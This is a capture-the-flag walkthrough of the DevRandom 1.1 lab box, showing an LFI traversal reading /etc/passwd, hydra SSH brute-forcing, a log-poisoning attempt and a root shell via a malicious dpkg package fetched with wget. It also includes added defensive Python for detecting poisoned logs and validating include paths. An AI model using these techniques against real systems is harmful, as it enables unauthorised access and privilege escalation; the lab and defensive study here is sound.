Vulnhub target DevRandom CTF 1.1: detailed testing walkthrough


DevRandom CTF: 1.1

Target information

Name: DevRandom CTF: 1.1
URL: https://www.vulnhub.com/entry/devrandom-ctf-11,450/
Identifying the target host IP address

```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:03      1      60  Unknown vendor
192.168.56.100  08:00:27:9c:b2:21      1      60  PCS Systemtechnik GmbH
192.168.56.254  08:00:27:ef:c4:95      1      60  PCS Systemtechnik GmbH
```

Using Kali Linux's built-in netdiscover tool, the target host IP address is identified as 192.168.56.254.
NMAP scan

```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 04:13 EDT
Nmap scan report for driftingblues.box (192.168.56.254)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 83e5a151b1f698d319e75910f7f4e85e (RSA)
|   256 b2a679c3ad2fbacc02b3420da2a39e60 (ECDSA)
|_  256 ec1fd4299fa5aeca93f4a86bfd614445 (ED25519)
80/tcp open  http    Apache httpd
| http-robots.txt: 3 disallowed entries
|_/wp-admin/ /wp-login.php /?include=info
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache
MAC Address: 08:00:27:EF:C4:95 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The NMAP results show that the target host has 2 open ports: 22 (ssh) and 80 (http).
Getting a shell

```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/robots.txt
User-agent: *
Disallow: /wp-admin/
Disallow: /wp-login.php
Disallow: /?include=info
```

However, visiting /wp-admin/ and /wp-login.php returns pages that are not those of a normal WordPress install.
Visit:

```
http://192.168.56.254/?include=info
```

The page source at this address shows that the CMS is WordPress, but the host address configured in it is wrong, so this line of analysis is of no value.
```
ing: 0 !important;
}
</style>
        <link rel='stylesheet' id='wp-block-library-css'  href='http://192.168.1.214/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' media='all' />
<link rel='stylesheet' id='twentytwenty-style-css'  href='http://192.168.1.214/wp-content/themes/twentytwenty/style.css?ver=1.1' media='all' />
```
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ nikto -h http://192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-05-27 04:17:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/wp-login.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ RFC-1918 /?include=info/: IP address found in the 'link' header. The IP is "192.168.1.214". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /robots.txt: Entry '/?include=info/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/wp-admin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /secret/: Directory indexing found.
+ /secret/: This might be interesting.
```

nikto found the /secret directory. Visiting it yields 3 files, one of which is 0 bytes in size and can be ignored:
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
  <title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
  <table>
   <tr><th valign="top"><img src="https://www.cnblogs.com/icons/blank.gif" alt="[ICO]"></th><th><a target="_blank" href="https://www.cnblogs.com/?C=N;O=D">Name</a></th><th><a target="_blank" href="https://www.cnblogs.com/?C=M;O=A">Last modified</a></th><th><a target="_blank" href="https://www.cnblogs.com/?C=S;O=A">Size</a></th><th><a target="_blank" href="https://www.cnblogs.com/?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="https://www.cnblogs.com/icons/back.gif" alt="[PARENTDIR]"></td><td><a target="_blank" href="https://www.cnblogs.com/">Parent Directory</a></td><td> </td><td align="right">  - </td><td> </td></tr>
<tr><td valign="top"><img src="https://www.cnblogs.com/icons/unknown.gif" alt="[   ]"></td><td><a target="_blank" href="https://www.cnblogs.com/arizona">arizona</a></td><td align="right">2020-03-19 16:52  </td><td align="right"> 42 </td><td> </td></tr>
<tr><td valign="top"><img src="https://www.cnblogs.com/icons/unknown.gif" alt="[   ]"></td><td><a target="_blank" href="https://www.cnblogs.com/nucleus">nucleus</a></td><td align="right">2020-03-19 16:51  </td><td align="right">  0 </td><td> </td></tr>
<tr><td valign="top"><img src="https://www.cnblogs.com/icons/unknown.gif" alt="[   ]"></td><td><a target="_blank" href="https://www.cnblogs.com/wrap">wrap</a></td><td align="right">2020-03-22 08:37  </td><td align="right">6.4K</td><td> </td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
```
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/arizona
API:4395874598yt3r9iy98r7r90t87treterrrrr

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/wrap
<p> john:Password123
```

The wrap file contains a username and password, but trying them shows they do not allow an SSH login.
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh john@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:AnG5VJ89V2BLxl3FruwQRAYjvRcsk/DSGj3zNJrfMyY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
john@192.168.56.254's password:
Permission denied, please try again.
```

This may be a trap.
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,html,sh,js
[+] Timeout:                 10s
===============================================================
2023/05/27 04:21:35 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 199]
/.html                (Status: 403) [Size: 199]
/index.php            (Status: 200) [Size: 74]
/wp-content           (Status: 301) [Size: 241] [--> http://192.168.56.254/wp-content/]
/wp-login.php         (Status: 200) [Size: 74]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 242] [--> http://192.168.56.254/wp-includes/]
/log.php              (Status: 200) [Size: 2324657]
/readme.html          (Status: 200) [Size: 7368]
/robots.txt           (Status: 200) [Size: 86]
/wp-trackback.php     (Status: 200) [Size: 74]
/secret               (Status: 301) [Size: 237] [--> http://192.168.56.254/secret/]
/secret.php           (Status: 200) [Size: 38]
```
Gobuster found the file /log.php.
Its page content reads: view acces.log file : /var/www/html/access.log
This log file records web access requests, so a shell could be obtained by inserting PHP code into a request header.
Burp Suite can intercept the request so that the User-Agent field is replaced with that PHP code.
But when /log.php is visited again afterwards, the returned content is still only: view acces.log file : /var/www/html/access.log
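Whether or not the poisoning takes effect, the attempt itself is recorded in the access log it targets. As an added example (not part of the original post), the following Python scanner parses Apache combined-format lines and flags client-controlled fields that carry PHP; the log lines it runs on are constructed for this example.

```python
"""Detect log-poisoning attempts in Apache access logs (added example, not the post's code).

/log.php on this box renders /var/www/html/access.log through PHP, so anything a client
puts in its User-Agent or request line lands in that file and would execute when viewed.
This scanner parses combined-format lines and flags client-controlled fields that carry
PHP open tags or execution primitives, which is what a defender would alert on.
"""
import re
from typing import Dict, List

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# PHP open tags (long and short-echo form) or common execution functions.
PHP_MARKERS = re.compile(
    r"<\?(php\b|=)|\b(system|passthru|shell_exec|exec|eval)\s*\(", re.I
)

# Constructed sample: one benign request followed by two poisoning attempts.
SAMPLE_LOG = """\
192.168.56.253 - - [27/May/2023:04:30:01 -0400] "GET /robots.txt HTTP/1.1" 200 86 "-" "curl/7.88.1"
192.168.56.253 - - [27/May/2023:04:31:10 -0400] "GET /log.php HTTP/1.1" 200 2324657 "-" "<?php echo 1; ?>"
192.168.56.253 - - [27/May/2023:04:31:44 -0400] "GET /?include=<?=1?> HTTP/1.1" 200 74 "-" "Mozilla/5.0"
"""


def find_poisoning(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per line whose request line or User-Agent contains PHP markers."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these separately
        for field in ("request", "agent"):
            if PHP_MARKERS.search(m.group(field)):
                findings.append({"host": m.group("host"), "time": m.group("time"),
                                 "field": field, "value": m.group(field)})
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in find_poisoning(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} poisoned {f['field']}: {f['value']!r}")
```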
So, back to robots.txt:

```
http://192.168.56.254/?include=info
```
There should be a local file inclusion vulnerability here, but note that the included file may sit deep in the directory tree, so several levels of ../ are needed.
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/?include=../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
_apt:x:103:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lisa:x:1001:1001:,,,:/home/lisa:/bin/bash
henri:x:1002:1002:,,,:/home/henri:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
wordpressftp:x:1003:1003:,,,:/var/www/html:/bin/rbash
victor:x:1004:1004:,,,:/home/victor:/bin/bash
trevor:x:1005:1005:,,,:/home/trevor:/bin/bash
```
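The include above works because the page joins the `include` parameter onto a path and includes the result. As an added example (not the box's PHP, and written in Python to model the check), `resolve_include()` shows the validation a defender would put in front of such a parameter, beside `vulnerable_resolve()`, which mirrors the flawed logic so both can be compared on the same traversal input; `INCLUDE_DIR` and `ALLOWED_PAGES` are assumptions.

```python
"""Hardened handling of a page-include parameter (added example, not the box's code).

index.php on this box includes whatever ?include= names, so a traversal such as
../../../../../../../../../etc/passwd walks out of the web root. resolve_include()
applies the checks a defender adds; vulnerable_resolve() reproduces the flawed logic.
"""
import posixpath
from typing import Optional

INCLUDE_DIR = "/var/www/html/pages"            # hypothetical fragment directory (assumption)
ALLOWED_PAGES = {"info", "home", "contact"}     # constructed allowlist (assumption)


def vulnerable_resolve(param: str) -> str:
    """Join and normalise, exactly what a naive include($dir . $param) ends up doing."""
    return posixpath.normpath(posixpath.join(INCLUDE_DIR, param))


def resolve_include(param: str) -> Optional[str]:
    """Return the file to include, or None when the request must be rejected."""
    # 1. Empty values and NUL bytes are rejected; a NUL can truncate the path in C code.
    if not param or "\x00" in param:
        return None
    # 2. Only a bare name is acceptable: no separators and no leading dot, which
    #    removes every ../ variant however deep the nesting is.
    if "/" in param or "\\" in param or param.startswith("."):
        return None
    # 3. Allowlist, not blocklist: only known page fragments may be included.
    if param not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(INCLUDE_DIR, param + ".php"))
    # 4. Defence in depth: the canonical path must still sit inside INCLUDE_DIR.
    if posixpath.commonpath([INCLUDE_DIR, candidate]) != INCLUDE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    probe = "../../../../../../../../../etc/passwd"
    print("vulnerable:", vulnerable_resolve(probe))   # escapes to /etc/passwd
    print("hardened:  ", resolve_include(probe))      # None: rejected
    print("hardened:  ", resolve_include("info"))     # the allowlisted fragment
```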
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ cat user.dict
trevor
victor
john
lisa
henri
```

```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ hydra -l trevor  -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.254
```

Trying to crack each user's password yields trevor's password, qwertyuiop[]; with rockyou.txt the cracking takes a fairly long time.
```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh trevor@192.168.56.254
trevor@192.168.56.254's password:
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 23 17:54:37 2020
trevor@lucifer:~$ ls -alh
total 28K
drwxr-x--- 4 trevor trevor 4.0K Mar 25  2020 .
drwxr-xr-x 7 root   root   4.0K Mar 23  2020 ..
-rw-r--r-- 1 trevor trevor  220 Mar 23  2020 .bash_logout
-rw-r--r-- 1 trevor trevor 3.5K Mar 23  2020 .bashrc
drwx------ 3 trevor trevor 4.0K Mar 23  2020 .gnupg
drwxr-xr-x 3 trevor trevor 4.0K Mar 23  2020 .local
-rw-r--r-- 1 trevor trevor  807 Mar 23  2020 .profile
trevor@lucifer:~$ sudo -l
Matching Defaults entries for trevor on lucifer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User trevor may run the following commands on lucifer:
    (root) NOPASSWD: /usr/bin/dpkg
```
Privilege escalation

Install fpm

```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo gem install fpm
```
Create the deb package following the GTFOBins steps

```
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ TF=$(mktemp -d)

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ echo 'exec /bin/sh' > $TF/x.sh

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
Created package {:path=>"x_1.0_all.deb"}
```
Upload the deb above to the /tmp directory on the target host

```
trevor@lucifer:/tmp$ wget http://192.168.56.253:8000/x_1.0_all.deb
--2023-05-27 04:38:20--  http://192.168.56.253:8000/x_1.0_all.deb
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1092 (1.1K) [application/vnd.debian.binary-package]
Saving to: ‘x_1.0_all.deb’
x_1.0_all.deb                           100%[============================================================================>]   1.07K  --.-KB/s    in 0s
2023-05-27 04:38:20 (37.1 MB/s) - ‘x_1.0_all.deb’ saved [1092/1092]
trevor@lucifer:/tmp$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 40777 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# cd /root
# ls -alh
total 40K
drwx------  4 root root 4.0K May 27 04:30 .
drwxr-xr-x 22 root root 4.0K Mar 19  2020 ..
-rw-------  1 root root  573 Mar 26  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root   89 Mar 22  2020 flag.txt
drwx------  3 root root 4.0K Mar 20  2020 .gnupg
-rw-------  1 root root   36 May 27 04:30 .lesshst
drwxr-xr-x  3 root root 4.0K Mar 19  2020 .local
-rw-------  1 root root  513 Mar 18  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
WELl DONE
echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > thisistheflag.txt
#
```